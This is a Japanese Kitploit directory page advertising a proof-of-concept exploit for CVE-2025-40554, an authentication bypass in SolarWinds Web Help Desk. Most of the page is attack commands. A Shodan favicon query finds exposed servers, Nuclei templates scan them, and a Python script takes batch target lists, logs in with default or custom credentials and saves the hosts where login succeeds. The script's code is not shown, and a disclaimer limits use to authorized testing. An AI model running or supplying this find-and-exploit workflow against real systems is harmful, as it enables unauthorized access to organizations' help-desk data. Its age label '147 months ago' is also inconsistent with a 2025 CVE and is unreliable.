Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
auth-bypass-CVE-2025-40554 — SolarWinds Web Help Deskの認証バイパスであるCVE-2025-40554の概念実証エクスプロイト。Nucleiテンプレートと、オプションの資格情報ログインを使用した単一またはバッチターゲットテスト用のPythonエクスプロイトを含む。 | Kitploit
ツール/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
認証と認可脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

SolarWinds Web Help Deskの認証バイパスであるCVE-2025-40554の概念実証エクスプロイト。Nucleiテンプレートと、オプションの資格情報ログインを使用した単一またはバッチターゲットテスト用のPythonエクスプロイトを含む。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
147ヶ月前未レビュー

CVE-2025-40554 – SolarWinds Web Help Desk 認証バイパス PoC

shodan クエリ

root@kitploit:~
http.favicon.hash:"1895809524"

Nuclei

root@kitploit:~
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
root@kitploit:~
pip install -r requirements.txt

使用方法

単一ターゲット(バイパス+ログイン、デフォルト client/client):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443
画像

カスタム認証情報を使用した単一ターゲット:

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

単一ターゲット、バイパスのみ(ログインなし):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

ターゲットリスト(脆弱性+ログイン成功のみ保存):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

カスタム認証情報を使用したターゲットリスト:

root@kitploit:~
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

クワイエットモード(ログインに成功したURLのみ表示):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt -q

免責事項

このPoCは認可されたセキュリティ研究およびテスト専用です。コンピュータシステムへの不正アクセスは違法です。著者は不正使用について一切責任を負いません。

ツールをダウンロード